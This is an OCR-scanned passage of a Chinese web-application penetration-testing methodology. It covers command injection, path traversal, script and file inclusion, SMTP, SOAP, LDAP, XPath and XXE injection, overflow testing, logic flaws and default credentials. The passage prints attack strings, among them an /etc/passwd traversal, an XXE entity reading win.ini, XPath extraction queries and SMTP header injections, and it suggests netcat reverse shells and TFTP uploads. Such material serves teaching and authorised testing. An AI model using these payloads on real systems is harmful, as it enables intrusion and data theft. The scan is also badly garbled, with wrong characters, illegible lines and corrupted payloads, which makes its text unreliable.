请 求 伪造 。 如 果 被 保存 的 数据 仅 同 提交 该 数据 的 用 户 显 示 ， 那 么 设法 找 
出 办 法 ， 链 接 已 经 发 现 的 所 有 漏洞 〈 如 不 完善 的 访问 控制 ) ， 从 而 在 其 
他 用 户 的 会 话 中 注入 一 个 攻击 。 

(6) 如 果 应 用 程序 允许 文件 上 传 与 下 载 ， 应 始终 探查 这 种 功能 是 
盏 易 于 受到 保存 型 XSS 攻 击 。 如 果 应 用 程序 允许 HTML. JAR 或 文本 文 
件 ， 且 并 不 确认 或 净化 它们 的 内 容 ， 那 么 几乎 可 以 肯定 它们 易于 受到 攻 
击 。 如 果 它 允许 JPEG 文 件 且 并 不 确认 其 中 是 否 包含 有 效 的 图 像 ， 那 么 
它 可 能 易于 受到 针对 Internet Explorer 用 户 的 攻击 。 测 试 应 用 程序 如 何 处 
理 它 支持 的 每 种 文件 类 型 ， 并 弄 清 浏览 器 如 何 处 理 包 含 HITML M EE 
内 容 的 啊 应 。 

(7) 在 一 名 用 户 提 交 的 数据 被 显示 给 其 他 用 户 的 每 一 个 位 置 ， 如 
果 应 用 程序 实施 的 过 滤 阻 止 友 动 保 存 型 XSS 攻 击 ， 确 定 应 用 程序 的 行为 
是 人 否 使 它 易 于 受到 本 站 点 请 求 伪 造 攻击 。 


























(1) 如 果 在 21.7.1 节 第 3 步 中 列 出 的 任何 命令 注入 攻击 字符 串 导 致 
应 用 程序 在 做 出 响应 时 出 现 反 铝 的 时 间 延 迟 ， 那 么 应 用 程序 易于 受到 
OS 命令 注入 攻击 。 手 动 重 复 进行 测试 ， 在 -i 或 -n 参 数 中 指定 不 同 的 值 ， 
确定 啊 应 时 间 是 否 随 着 这 个 值 而 发 生 系 统 性 的 变化 。 

(2) 使 用 所 发 现 的 任何 一 个 可 成 功 实施 攻击 的 注入 字符 串 ， 党 试 
注入 另 一 个 更 加 有 用 的 命令 〈 如 1$ 或 dir) ， 确 定 是 否 能 够 将 命令 结果 返 
回 到 浏览 右上。 

(3) 如 果 不 能 直接 获得 命令 执行 结果 ， 还 可 以 采用 其 他 方法 。 

口 可 以 尝试 打 开 一 条 通 回 上 自己 计算 机 的 带 外 通 
道 。 尝 试 使 用 TFTP 上 传 工具 至 服务 器 ， 使 用 telnet 或 
netcat 建 立 一 个 通 癌 自己 计算 机 的 反问 shell， 并 使 用 
mail 命 令 通 过 SMTP 发 送 命 令 结 果 。 

口 可 以 将 命令 结果 重 定 同 到 Web 根 目录 下 的 一 个 
文件 ， 然 后 使 用 上 自己 的 浏览 占 直 接 获 取 结 果 。 例 如 : 








dir > c:\inetpub\wwwroot\foo.txt 


(4) 一旦 找到 注入 命令 的 方法 并 能 够 获得 命令 执行 结果 ， 就 应 当 
确定 自己 的 权限 (通过 使 用 whoami 或 类 似 命令 ， 或 者 尝试 向 一 个 受 保 
护 的 目录 写 入 一 个 无 害 文件 ) 。 然 后 就 可 以 设法 提升 自己 的 权限 ， 进 而 
en eRe eae 
IL. 


(5) 如 果 知 道 自己 的 输入 被 提交 给 某 个 OS 命 令 ， 但 提交 前 面 列 出 
的 攻击 字符 串 无 法 成 功 实施 攻击 ， 那 么 观察 是 否 可 以 使 用 < 或 > 字符 将 一 
个 文件 的 内 容 指 辣 命令 的 输入 ， 或 者 将 命令 的 输出 指向 一 个 文件 。 可 以 
使 用 这 种 方法 读 取 或 写 入 任意 文件 的 内 容 。 如 果 知 道 或 能 够 猜测 出 被 执 
行 的 命令 ， 尝 试 注入 与 该 命令 有 关 的 命令 行 参数 ， 以 有 利 的 方式 修改 它 
的 行为 〈 例 如 ， 指 定 web 根 目录 中 的 输入 文件 ) 。 

(6) 如 果 发 现 应 用 程序 对 实施 命令 注入 所 需 的 某 些 字符 进行 转 
义 ， 可 尝试 在 这 些 字 符 串 中 插入 转 义 字符 。 如 果 应 用 程序 并 不 对 转 义 字 
符 本 身 进 行 转 义 ， 束 可 以 利用 这 种 行为 避 开 应 用 程序 的 防御 机 制 。 如 果 
符 被 阻止 或 净化 ， 就 可 以 使 用 $IFS 蔡 代 在 UNIX 平 台中 出 现 的 


21.7.5 MAK N 


(1) 对 于 执行 的 每 次 模糊 测试 ， 检 查 在 21.7.1 节 第 3 步 中 列 出 的 路 
径 轴 历 攻 击 字 符 串 生成 的 结果 。 可 以 在 Burp Intruder? #6 Ay] 
的 顶部 ， 按 有 效 载 集 对 结果 表 进 行 分 类 ， 从 而 将 这 些 字 符 串 生成 的 结 
分 组 。 如 果 收 到 一 个 不 稼 见 的 错误 消息 ， 或 者 长 度 不 正和 的 啊 应 ， 手 动 
检查 啊 应 ， 确 定 其 中 是 否 包 含 特定 文件 的 内 容 或 其 他 表示 执行 了 反常 文 
件 操 作 的 证 据 。 

(2) 在 解析 应 用 程序 的 受 攻击 面 的 过 程 中 ， 应 该 已 经 注意 到 了 一 
些 专 用 的 功能 ， 使 用 它们 可 根据 用 户 提 交 的 输入 读 取 和 写 入 文件 。 除 了 
对 所 有 参数 进行 模糊 测试 外 ， 还 应 极其 仔细 地 手动 测试 这 项 功能 ， 确 定 
所 有 路 径 裔 历 漏 洞 。 

(3) 如 果 某 个 参数 中 包含 一 个 文件 名 、 文 件 名 的 一 部 分 或 一 个 目 
录 ， 修 改 这 个 参数 的 值 ， 并 在 其 中 插入 任意 一 个 子 目 录 和 一 个 过 历 序 
列 。 例 如 ， 如 果 应 用 程序 提交 参数 : 


file=foo/filel.txt 


那么 可 以 答 试 提交 以 下 值 : 























file=foo/bar/../filel.txt 


如 果 两 种 情况 下 应 用 程序 的 行为 完全 相同 ， 那 么 它 易 于 受到 攻击 ， 
渗透 测试 员 应 该 继续 以 下 步骤 。 如 果 在 上 述 两 种 情况 下 应 用 程序 的 行为 
有 所 不 同 ， 那 么 应 用 程序 可 能 阻止 、 删 除 或 净化 遍历 序列 ， 致 使 文件 路 
径 失 效 。 尝 试 使 用 第 10 间 描述 的 编码 与 其 他 攻击 避 开 过 小 。 

(4) 如 果 前 面 在 基础 目录 中 使 用 珊 历 序列 的 测试 取得 成 功 ， 党 试 
使 用 其 他 序列 上 漳 到 基础 目录 ， 并 访问 服务 右 操 作 系统 中 的 已 知 文件 。 
如 果 这 些 党 试 失败 ， 应 用 程序 可 能 在 许可 文件 访问 前 实施 了 各 种 过 滤 或 
这 些 控制 。 

(5) 应 用 程序 可 能 会 检查 被 请 求 的 文件 扩展 名 ， 只 人 允许 用 户 访问 
特殊 类 型 的 文件 。 汐 试 使 用 空 字 节 或 换行 符 攻 击 ， 并 在 后 面 连接 已 知 
的 、 应 用 程序 接受 的 文件 扩展 名 ， 设 法 避 开 过 滤 。 例 如 : 


二 
ee Ry MN (NY ~ dd ol dd SADE- Wg ee 


(6) 应 用 程序 可 能 会 检查 用 户 提交 的 文件 路 径 是 否 以 一 个 特定 的 
文件 名 或 词根 开头 。 答 试 将 过 历 序列 附加 在 一 个 已 知 应 用 程序 接受 的 词 
根 后 面 ， 避 开 过 滤 。 例 如 : 


/images/../../../../../../../etc/passwd 


(7) 如 果 这 些 攻 击 无 法 取得 成 功 ， 尝 试 组 合 使 用 几 种 测试 技巧 ， 
首先 对 基础 目录 进行 全 面 的 测试 ， 了 解 应 用 程序 实施 的 过 小 以 及 它 如 何 
处 理 无 法 预料 的 输入 。 

(8) 如 果 能 够 读 取 服务 器 上 的 任意 文件 ， 尝 试 获取 以 下 任何 一 个 
文件 ， 进 而 扩大 攻击 范围 。 

口 操作 系统 与 应 用 程序 的 密码 文件 。 

口 服务 器 与 应 用 程序 配置 文件 ， 发 现 其 他 漏洞 或 
优化 另 一 次 攻击 。 

口 可 能 含有 数据 库 证 书 的 包含 文件 。 

口 应 用 程序 使 用 的 数据 源 ， 如 MySQL 数 据 库 文件 


























或 XML 文件 。 
口 服务 器 可 执行 页 面 的 源 代 码 ， 以 执行 搜索 漏洞 
的 代码 审查 。 





PO a 


(9) 如 果 能 够 号 入 服务 器 上 的 任意 文件 ， 分 析 是 否 可 以 实施 以 下 
攻击 ， 进 而 扩大 攻击 范围 。 
口 在 用 户 的 局 动 文 件 夹 中 创建 脚本 。 
口 当 用 户 下 一 次 连接 时 ， 修 改 imn.ftpd 等 文件 执行 
任意 命令 。 
口 在 一 个 拥有 执行 许可 的 Web 目 录 中 写 入 脚本 ， 
从 浏览 器 调用 它们 。 


21.7.6 ”测试 脚本 六 


(1) 对 于 执行 的 每 一 次 模糊 测试 ， 在 测试 结果 中 搜索 字符 哩 
111111 本 身 〈 即 它 前 面 没 有 其 他 测试 字符 串 〉。 在 Burp Intruder 中 ， 按 
住 Shift 键 的 同时 单 击 111111 Grep 字 人 符 串 标题 ， 对 所 有 包含 这 个 字符 串 的 
结果 进行 分 类 ， 即 可 迅速 确定 这 些 字 符 串 。 确 定 的 任何 结果 都 可 能 易于 
受到 脚本 命令 注入 攻击 。 

(2) 检查 使 用 脚本 注入 字符 串 的 所 有 测试 ， 确 定 所 有 包含 脚本 错 
误 消 明 的 测试 ， 这 些 错误 消息 表示 输入 被 执行 ， 但 造成 一 个 错误 ， 因 而 
可 能 需要 对 测试 进行 优化 ， 以 成 功 实施 脚本 注入 。 

(3) 如 果 应 用 程序 似乎 易于 受到 攻击 ， 通 过 注入 其 他 专门 针对 应 
用 程序 所 使 用 的 脚本 平台 的 命令 ， 确 认 漏 洞 是 否 存在 。 例 如 ， 可 以 使 用 
类 似 于 模糊 测试 OS 命令 注入 时 使 用 的 攻击 有 效 载 从 : 

system('ping%20127.0.0.1') 

















21.7.7 ”测试 & 


C1) 如 果 在 模糊 测试 时 收 到 任何 由 目标 应 用 程序 的 基础 架构 提出 
的 HITP 连 接 ， 那 么 几乎 可 以 肯定 应 用 程序 易于 受到 远程 文件 包含 攻 
击 。 以 单线 程 的 方式 在 有 限 的 时 间 内 重复 相关 测试 ， 确 定 到 底 是 哪些 参 
数 致使 应 用 程序 提出 HTTP 请 求 。 

(2) 检查 文件 包 售 测试 结果 ， 确 定 在 应 用 程序 的 啊 应 中 造成 反常 
延迟 的 所 有 测试 。 在 这 些 情况 下 ， 可 能 应 用 程序 本 身 易 于 受到 攻击 ， 但 
HTTP 请 求 可 能 因为 网 络 级 过 滤 而 超时 。 

(3) 如 果 发 现 一 个 远程 文件 包含 漏洞 ， 部 署 一 台 包 含 恶 意 脚本 
(专门 针对 所 攻击 的 语言 而 编写 ) 的 Web 服 务 器 ， 使 用 和 测试 脚本 注入 
类 似 的 命令 确定 脚本 是 否 被 执行 。 

















除了 前 面 介绍 的 基于 输入 的 漏洞 外 ， 还 有 一 系列 漏洞 只 有 在 特殊 功 

才 会 表现 出 来 。 在 实践 下 面 的 测试 步 台 之前， 渗透 测试 员 首先 应 当 
对 应 用 程序 的 受 攻击 面 的 评估 结果 进行 分 析 ， 确 定 可 能 出 现 这 些 漏洞 的 
应 用 程序 功能 ， 并 集中 精力 测试 这 些 功能 


应 用 程序 解析 结果 














图 21-9 测试 功能 方面 的 输入 漏洞 





21.8.1 测试 SMTP 注 


(1) 对 于 与 电子 邮件 有 关 的 功能 使 用 的 每 一 个 请 求 ， 轮 流 提 交 以 
下 每 个 测试 字符 串 作 为 每 一 个 参数 ， 并 在 相关 位 置 插入 电子 邮件 地 址 。 
如 步骤 21.7.1 所 述 ， 可 以 使 用 Burp Intruder 自 动 完成 这 项 任务 。 这 些 测试 
ee aes 因此 不 需要 再 对 它们 进行 编 








<youremmil>$ fate: <youremai_> 
<ycouremeil>tyatdate : <yourenai i> 
<youremeil>ti3abee : <yourenmai_> 
<yourcmail>%0é%0aBee:<yourcma__> 


SUSDATARY OE Loos Jate DAMALTL+PROM: +<youremail>sCaRCoT+70:+<youremal_> 
$02JIATASDRL' rom: +<yourenai _>Sdavto:+<yourenail>tluaSubjecc: +cesttualoe 


SVasZ2osva 


SOAS VSDATASISS a _COotIctlatZcot0c¢JaMAlL+FRCOM: —<yourcnal_>#IctIaRCPT 

on EE ON AOE A 

30d3 Ja fub ecT: TSTSIISHIAa oo ISYIad ed Isa 

(2) 检查 测试 结 末 ， 确 定 应 用 程序 返回 的 所 有 错误 消息。 如 采 这 
些 错 误 与 电子 邮件 功能 中 的 问题 有 关 ， 确 定 是 否 有 必要 调整 输入 ， 以 利 
用 漏洞 。 

(3) 应 该 监控 指定 的 电子 邮件 地 址 ， 看 是 否 收 到 任何 电子 邮件 。 

(4) 仔细 检查 生成 相关 请 求 的 HTML 表 单 。 它 们 可 能 提供 与 服务 
器 端 软件 有 关 的 线索 。 其 中 可 能 包含 一 个 用 于 指定 电子 邮件 收 件 人 
(To) 地 址 的 隐藏 或 禁用 字段 ， 可 以 直接 对 其 进行 修改 。 

















1. 测试 缓冲 区 溢出 

(1) 问 每 一 个 目标 数据 提交 一 系列 稍 大 于 常用 绥 冲 区 大 小 的 长 字 
符 串 。 一 次 针对 一 个 数据 实施 攻击 ， 最 大 程度 地 和 窗 盖 应 用 程序 中 的 所 有 
代码 路 径 。 可 以 使 用 Burp Intruder 中 的 字符 块 有 效 载荷 来 源 自 动 生成 各 
种 大 小 的 有 效 载荷 。 可 以 对 下 面 的 缓冲 区 大 小 进行 测试 : 


1100 

4200 

33000 

(2) 监控 应 用 程序 的 响应 ， 确 定 所 有 反常 现象 。 任 何 无 法 控制 的 
溢出 几乎 可 以 肯定 会 在 应 用 程序 中 造成 异常 ， 虽 然 远 程 诊断 问题 的 本 质 
可 能 非常 困难 。 寻 找 以 下 反常 现象 。 

口 HTTP 500 状 态 码 或 错误 消息 ， 这 时 其 他 畸形 
(而 非 超 长 ) 输入 不 会 产生 相同 的 结果 。 








口 内容 详细 的 消息 ， 表 示 某 个 外 部 本 地 代码 组 件 
发 生 故 障 。 
口服 务 堪 收 到 一 个 局 部 或 畸形 啊 应 。 
口 服务 器 的 TCP 连 接 未 返回 啊 应 ， 突 然 关 闭 。 
口 整 个 web 应 用 程序 停止 啊 应 。 
口 应 用 程序 返回 出 人 意料 的 数据 ， 表 示 内 存 中 的 
一 个 字符 串 可 能 “丢失 ”了 它 的 空 终止 符 。 
2. 测试 整数 漏洞 
C1) 当 测 斌 本 地 代码 组 件 时 ， 确 定 所 有 基于 整数 的 数据 ， 特 别 是 
长 度 指 示 符 ， 可 以 利用 它 触 发 整数 漏洞 。 
(2) 问 每 一 个 目标 数据 提交 是 在 触发 漏洞 的 适当 有 效 载 荷 。 轮 流 
回 每 一 个 目标 数据 发 送 一 系列 不 同 的 值 ， 分 别 表示 不 同 大 小 的 有 符号 与 
无 符号 整数 值 的 边界 情况 ， 如 下 所 示 。 
口 0x7f 与 0x80 (127 与 128) 
口 0xff 与 0x100 (255 与 256) 
口 0x7ffff 与 0x8000 (32 767 与 32 768) 
口 Oxffff 与 0x10000 (65 535 与 65 536) 
O Ox7fffffff50x80000000 (2 147 483 647 与 2 147 
483 648 ) 
O Oxffffffff 与 0x0 (4 294 967 295450) 
(3) 当 被 修改 的 数据 以 十 六 进 制 表示 时 ， 应 该 发 送 每 个 测试 字符 
串 的 little-endian 与 big-endian 版 本 ,例如 ，ff7f 以 及 7fff。 如 果 十 六 进 制 
数字 以 ASCII 形 式 提 交 ， 应 该 使 用 应 用 程序 上 自身 使 用 的 字母 字符 ， 确 保 
这 些 字 符 被 正确 编码 。 
(4) 如 21.8.2 节 第 1 步 的 2) 所 述 ， 监 控 应 用 程序 的 啊 应 ， 碍 找 所 
有 有 反常 事件 。 
3. 测试 格式 化 字符 串 漏洞 
(1) 轮流 同 每 一 个 参数 提交 包含 一 长 串 不 同 格式 说 明 符 的 字符 
Po Hin: 
SFnSnSnF*nFsnF$nsnsnsnsn$snstnsnSsnFsnsnS$nstnsnFn 
SstsSstststststssststssststststs$ststs3s 
SLin!<2in! SI Iini'S4in! Shin! S6l ln! ST IiniS8iniS9in!Flo!n! etc... 
SLIS!B2!s!S3IsiS4isltS5ishtF6lslS7TIsit$8lsl¥9isit#¥id!s! etc... 
记得 将 % 字 符 URL 编 码 成 %25。 
(2) 如 21.8.2 节 第 1 步 的 (2) 所 述 ， 监 控 应 用 程序 的 啊 应 ， 碍 找 所 
有 反常 事件 。 




















21.8.3” 测 试 SOAP 注 


C1) 轮 法 测试 怀疑 通过 SOAP 消 居 处 理 的 参数 。 提 交 一 个 恶意 
XML 结束 标签 ， 如 </foo>。 没 有 发 生 错 误 就 表示 该 输入 可 能 没有 插入 
SOAP 消 息 中 ， 或 者 以 某 种 方式 被 净化 。 

(2) 出 现 错误 就 提交 一 对 有 效 的 起 始 与 结束 标签 ， 如 <foo> 
</foo>。 如 果 这 对 标签 使 错误 消失 ， 应 用 程序 很 可 能 易于 受到 攻击 。 

(3) 如果 提交 的 攻击 字符 串 在 应 用 程序 的 啊 应 中 原样 返回 ， 轮 流 
提交 下 面 两 个 值 。 如 果 发 现 其 中 一 个 值 的 返回 结果 为 妨 一 个 值 ， 或 者 只 
是 返回 test， 那 么 可 以 确信 该 输入 被 插入 到 了 XML 消 息 中 。 














test<foo/> 


test<foo></foo> 


(4) WRATTPBK FAG ILS ASOP ÄRA RSA it 
在 一 个 参数 中 插入 起 始 注释 字符 <!--， 在 另 一 个 参数 中 插入 结束 注释 字 
符 !-->。 然 后 ， 轮 换 在 参数 中 插入 这 两 个 字符 (因为 无 法 知道 参数 出 现 
的 顺序 ) 。 这 样 做 可 能 会 把 服务 器 SOAP 消 息 的 某 个 部 分 作为 注释 处 
理 ， 人 而 改变 应 用 程序 的 过 筑 ， 或 者 形成 “个 可 能 造成 信息 泄露 的 错误 


RT 
21.8.4 ”测试 LDDAP 汗 


(1) 在 任何 使 用 用 户 提交 的 数据 从 一 个 目录 服务 中 获取 信息 的 功 
能 中 ， 针 对 每 一 个 参数 ， 轮 流 测 试 是 否 可 以 注入 LDAP 仁 询 。 

(2) 提交 * 字 符 。 返 回 大 量 结 果 束 明确 表示 针对 的 是 LDAP 查 询 。 

(3) 尝试 输入 大 量 闭 括 写 : 


EFFI Id 


这 个 输入 会 使 查询 语法 失效 ， 因 此 ， 如 果 它 导致 错误 或 其 他 反常 行 
为 ， 那 么 应 用 程序 易于 受到 攻击 (许多 其 他 应 用 程序 功能 和 注入 情况 也 
会 造成 相同 的 结果 》。 

(4) 尝试 输入 干扰 不 同 查 询 的 各 种 表达 式 ， 看 是 否 影 响 返 回 的 结 
果 。 在 查询 目录 未 知 的 情况 下 cn 非常 有 用 ， 因 为 所 有 的 LDAP 实 现 都 文 
持 这 个 特性 。 





(5) 尝试 在 输入 结尾 增加 其 他 属性 ， 并 用 和 逗号 分 隔 这 些 属性 。 轮 
流 测 试 每 一 个 属性 ， 返 回 错误 消 因 就 表示 该 属性 当前 无 效 。 以 下 属性 常 
用 在 由 LDAP 查 询 的 目录 中 : 


en 





ve 
mail 
givenname 


uid 
objectclass 
postaladdress 
dn 

sn 


21.8.5 ”测试 XPath 注 


(1) 尝试 提交 下 面 的 值 ， 并 确定 它们 是 否 会 使 应 用 程序 的 行为 发 
生 改 变 ， 但 不 会 造成 错误 : 


' or count (parent:=:* [position(}=1])=0 or ‘a'='b 
'a' 








o 


' or count (parent: :*[position(})=1])>0 or 
(2) 如 果 参 数 为 数字 ， 尝 试 提交 下 面 的 测试 字符 串 : 


1 or count (Parent ::* [Position()=1])=0 
1 or count (parent::* [position(}=1])>0 


C3) 如 果 上 面 的 任何 字符 串 导 致 应 用 程序 的 行为 发 生 改变 ， 但 不 
会 造成 错误 ， 很 可 能 可 以 通过 设计 测试 条 件 ， 一 次 提取 一 字 市 的 信息 ， 
ee A ie Ie es 
名称: 

















substring (name (parent: :*[position({)=1]),1,1)=‘a' 


(4) 提取 出 父 节点 的 名 称 后 ， 使 用 一 系列 下 列 格式 的 条 件 提 取 
XML 树 中 的 所 有 数据 。 


substring (//parentnodename [pesition(})=1]/child: :node() [positicn({)=1] 
/text(),1,1)="a' 





(1) 确定 在 参数 中 指定 内 部 服务 器 名 称 或 耻 地 址 的 任何 情况 。 提 
交 任意 服务 器 和 端口 ， 监 视 应 用 程序 是 否 出 现 超时 。 还 可 以 提交 
localhost， 然 后 提交 自己 的 IP 地 址 ， 之 后 在 指定 端口 上 监视 传 入 连接 。 

(2) 针对 根据 特定 值 返 回 特定 页 面 的 请 求 参 数 ， 党 试 使 用 以 下 各 
种 语法 附加 新 的 注入 参数 : 

%26foo%3dbar (URL 编 码 的 &foo=bar ) 

$3bfoo%3dbar ( URL 编码 的 :foo=bar ) 

$2526fo008253dbar ( 双重 URL 编 码 的 &foo=bar ) 

如 果 应 用 程序 的 行为 与 未 修改 原始 参数 时 相同 ， 说 明 其 中 可 能 存在 

HTTP 参 数 注入 漏洞 。 这 时 ， 可 通过 注入 可 能 更 改 后 端 逻辑 的 已 知 参数 
的 名 / 值 对 来 攻击 后 端 请 求 〈 如 第 10 章 所 述 ) 。 


21.8.7 ”测试 XXE 注 
如 果 用 户 正 向 服务 器 提交 XML， 则 可 以 实施 外 部 实体 注入 攻击 。 


如 果 已 知 会 同 用 户 返 回 茶 个 字段 ， 可 以 答 试 指定 一 个 外 部 实体 ， 如 下 所 
ZN: 








POST /search/128/AjaxSearch.ashx HTTP/1.1 
Host: mdsec.net 
Content-Type: text/xml; charset=UTF-8 


Content-Length: 115 
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM “file:///windows/win.ini" > ]> 
如 果 找 不 到 已 知 字段 ， 可 以 将 “http://192.168.1.1:25” 指 定 为 外 部 实 


体 ， 并 监视 页 面 啊 应 时 间 。 如 果 页 面 啊 应 的 时 间 明 显 增长 或 页 面 超时 ， 
则 说 明 应 用 程序 易于 受到 攻击 。 


21.9 lll ihe He eR Be 


21.9.1 确定 关键 的 受 攻 击 面 
21.9.3 不 完 
整 的 输入 


21.9.5 测试 
图 21-10 测试 逻辑 缺陷 


21.9.2 测试 


21.9.4 测试 
多 阶段 过 程 


信任 边界 交易 逻辑 








— 


21.9.1 确定 关键 的 受 了 了 


D 逻辑 缺陷 的 形式 多 种 多 样 ， 并 且 可 能 存在 于 应 用 程序 功能 的 
每 一 方面 。 为 确保 探查 逻辑 缺陷 的 效率 ， 痛 先 应 该 将 受 攻击 面 缩小 到 一 
个 适当 的 范围 ， 以 方便 手动 测试 。 

(2) 检查 应 用 程序 解析 过 程 中 获得 的 结果 ， 确 定 以 下 情况 。 
口 多 阶段 过 程 。 
口 重 要 的 安全 功能 ， 如 登录 。 
口 信任 边界 的 转换 《〈 例 如 ， 登 录 时 由 匿名 用 户 转 
变 为 自我 注册 用 户 ) 。 
口 检查 和 调整 交易 价格 或 数量 。 


21.9.2 ”测试 多 阶段 过 程 


(1) 如 果 一 个 多 阶段 过 程 需 要 按 预 定 的 顺序 提交 一 系列 请 求 ， 尝 
试 按 其 他 顺序 提交 这 些 请 求 。 尝 试 完全 省 略 某 些 阶段 ， 几 次 访问 同一 个 
阶段 ， 或 者 推 后 访问 前 一 个 阶段 。 

(2) 这 些 阶 段 可 能 通过 一 系列 指 同 特殊 URL 的 GET 或 POST 请 求 进 
行 访问 ， 或 者 需要 癌 同 一 个 URL 提 区 不 同 的 参数 。 被 访问 的 阶段 可 通过 

















在 被 请 求 的 参数 中 提交 功能 名 称 或 索引 来 指定 。 确 保 完 全 了 解 应 用 程序 
访问 不 同 阶段 所 使 用 的 机 制 。 

(3) 除了 打 乱 操作 步 又 的 顺 友 外 ， 和 尝试 提取 在 一 个 过 程 阶段 提交 
的 参数 ， 并 在 男 一 个 阶段 提交 这 些 参数 。 如 果 相 关 数 据 修 应 用 程序 更 
新 ， 应 当 确 定 是 否 可 以 利用 这 种 行为 破坏 应 用 程序 的 馆 辑 。 

(4) 如 果 在 一 个 多 阶段 过 程 中 ， 不 同 的 用 户 对 同一 组 数据 进行 操 
作 ， 提 取 茶 一 名 用 户 提 区 的 每 一 个 参数 ， 再 由 万 一 名 用 户 提交 这 些 参 
nn 
衍生 效果 。 

(5) 根据 执行 功能 的 情形 ， 了 解 开 发 者 做 出 的 假设 以 及 主要 受 攻 
| 
TIE 0 

(6) 如 果 不 按 顺 序 访问 多 阶段 功能 ， 应 用 程序 常 弟 表现 出 一 系列 
异常 现象 ， 如 变量 值 为 空 字符 或 未 被 初始 化 ， 状 态 仅 部 分 定义 或 相互 巴 
盾 ， 以 及 其 他 无 法 预料 的 行为 。 寻 找 有 用 的 错误 消 恩 和 调试 结果 ， 可 以 
Se me lee ee 
Fi TK» 























21.9.3 ”测试 不 完整 的 输 





(1) 应 用 程序 的 重要 安全 功能 需要 处 理 大 量 用 户 提交 的 输入 ， 并 
根据 这 些 输入 做 出 决策 。 因 此 ， 应 测试 这 些 功 能 对 不 完整 输入 的 适应 
TE. 


(2) 轮流 测试 每 一 个 参数 ， 从 请 求 中 删除 参数 的 名 称 与 值 。 监 控 
应 用 程序 的 啊 应 ， 碍 找 所 有 行为 异常 或 错误 消息 ， 它 们 可 能 提供 与 应 用 
程序 逻辑 有 关 的 信息 。 

(3) 如 果 所 操纵 的 请 求 属于 一 个 多 阶段 过 程 ， 应 测试 整个 过 程 ， 
a OE ee a ae Pel 
入 处 理 。 


21.9.4 ”测试 信任 边 


(1) 了 解 应 用 程序 如 何 处 理 不 同 用 户 信任 状态 之 间 的 转换 。 寻 找 
能 ， 帮 助 一 名 拥有 特定 信任 地 位 的 用 户 球 积 一 定量 与 其 身份 有 关 的 状 
态 ， 例 如 ， 匿 名 用 户 在 自我 注册 过 程 中 提供 个 人 信息 ， 或 者 完成 则 在 确 
认 其 号 份 的 账户 恢复 过 程 。 

(2) 寻找 办 法 ， 通 过 在 一 个 区 域 积累 相关 状态 ， 在 信任 边界 之 间 














Th 


aN 








进行 不 恰当 的 转换 ， 然 后 以 正常 不 被 允许 的 方式 切换 到 另 一 个 区 域 。 例 
如 ， 完 成 部 分 账户 恢复 过 程 后 ， 和 尝试 切换 到 与 菜 一 名 用 户 有 关 的 通过 验 
| 
言 任 级 别 。 

C3) 确定 是 否 可 利用 更 高 权限 的 功能 直接 或 间接 访问 或 者 猜测 某 


些 信息 。 

















21.9.5 ”测试 交易 逻辑 


(1) 如 果 应 用 程序 设置 交易 限额 ， 测 试 提 交 负 值 会 造成 什么 影 
i a 
这 种 限额 。 

(2) 分 析 是 否 可 以 使 用 一 连 串 的 交易 达成 一 种 状态 ， 然 后 利用 它 
达到 目的 。 例 如 ， 测 试 是 否 可 以 在 账户 之 间 进 行 几 次 低 额 转账 ， 就 可 以 
产生 一 种 应 用 程序 的 逻辑 将 会 阻止 的 较 大 余额 。 

(3) 如 果 应 用 程序 根据 用 户 控 制 的 数据 或 操作 确定 的 标准 调整 价 
格 或 其 他 敏感 价值 ， 弟 先 应 了 解 应 用 程序 使 用 的 算法 以 及 需要 调整 的 逻 
ee ee 
行 修改 。 

(4) 努力 想 办 法 操纵 应 用 程序 的 行为 ， 使 应 用 程序 进行 的 调整 与 
开发 者 最 初 设 定 的 标准 相互 矛盾 。 











21.10.1 测试 共享 基础 架构 之 间 的 隔离 


21.10.2 测试 使 用 ASP 主 机 的 应 用 程序 之 间 的 隔离 


图 21-11 测试 共享 主机 漏洞 





(1) 如 果 应 用 程序 在 一 个 共享 基础 架构 中 运行 ， 分 析 它 为 共享 环 
境 中 的 客户 端 提供 的 用 于 更 新 和 管理 其 内 容 与 功能 的 访问 机 制 。 考 虑 以 


下 问题 。 
口 远程 访问 机 制 是 否 使 用 一 个 安全 的 协议 与 经 过 
适当 强化 的 基础 架构 ? 
口 客户 端 是 否 能 够 访问 他 们 正常 情况 下 不 能 访问 
的 文件 、 数 据 及 其 他 资源 ? 
口 客户 端 是 否 能 够 在 主机 环境 中 获得 一 个 交互 式 
的 shell， 并 执行 任意 命令 ? 
(2) 如 果 使 用 一 个 所 有 权 应 用 程序 ， 以 方便 客户 端 配置 和 定制 共 
享 环 境 ， 考 虑 是 个 能 够 以 这 个 应 用 程序 为 攻击 目标 ， 攻 破 该 环境 本 刁 以 
及 其 中 运行 的 所 有 应 用 程序 。 














(3) 如 果 能 够 在 某 个 应 用 程序 中 执行 命令 、 注 入 SQL 脚本 或 访问 
F o 








C1) 如 果 使 用 ASP 主 机 的 应 用 程序 由 许多 共享 与 定制 组 件 构成 ， 
确定 其 中 的 任意 共享 组 件 ， 如 日 志 机 制 、 管 理 功能 以 及 数据 库 代 人 码 组 
件 ， 答 试 利用 这 些 组 件 攻 破 应 用 程序 的 共 且 部分， 进而 攻破 其 他 应 用 程 





FF. 

(2) 如 果 共 享 环境 使 用 一 个 常用 的 数据 库 ， 使 用 NGSSquirrel 之 类 
的 数据 库 扫描 工具 ， 全 面 审 查 数据 库 配 置 、 补 本 版 本 、 表 结构 以 及 许 
可 。 数 据 库 安 全 模型 中 存在 的 任何 缺陷 都 可 加 以 利用 ， 将 攻击 范围 由 一 
个 应 用 程序 扩大 到 另 一 个 应 用 程序 。 





21.11.1 测试 默认 证 书 
21.11.2 测试 默认 内 容 


21.11.5 测试 虚拟 主机 配置 不 当 
21.11.6 测试 Web 服 务 吉 软件 漏洞 


21.11.7 测试 Web 应 用 程序 防火 墙 


图 21-12 ”测试 Web 服务器 漏洞 








D 检查 应 用 程序 解析 过 程 中 获得 的 结果 ， 确 定 应 用 程序 使 用 
的 、 可 能 包含 可 访问 的 管理 接口 的 Web 服务 器 与 其 他 技术 。 


(2) 对 Web 服 务 器 进行 问 口 扫描 ， 确 定 在 指 回 主 目标 应 用 程序 的 
不 同 端口 上 运行 的 所 有 管理 接口 。 
(3) 对 于 确定 的 接口 ， 但 阅 制 造 商 文档 资料 与 常用 默认 密码 表 ， 
获得 默认 证 书 。 
(4) 如 果 默 认证 书 无 效 ， 使 用 21.4 节 描述 的 技巧 党 试 猜测 有 效 的 


证 书 。 
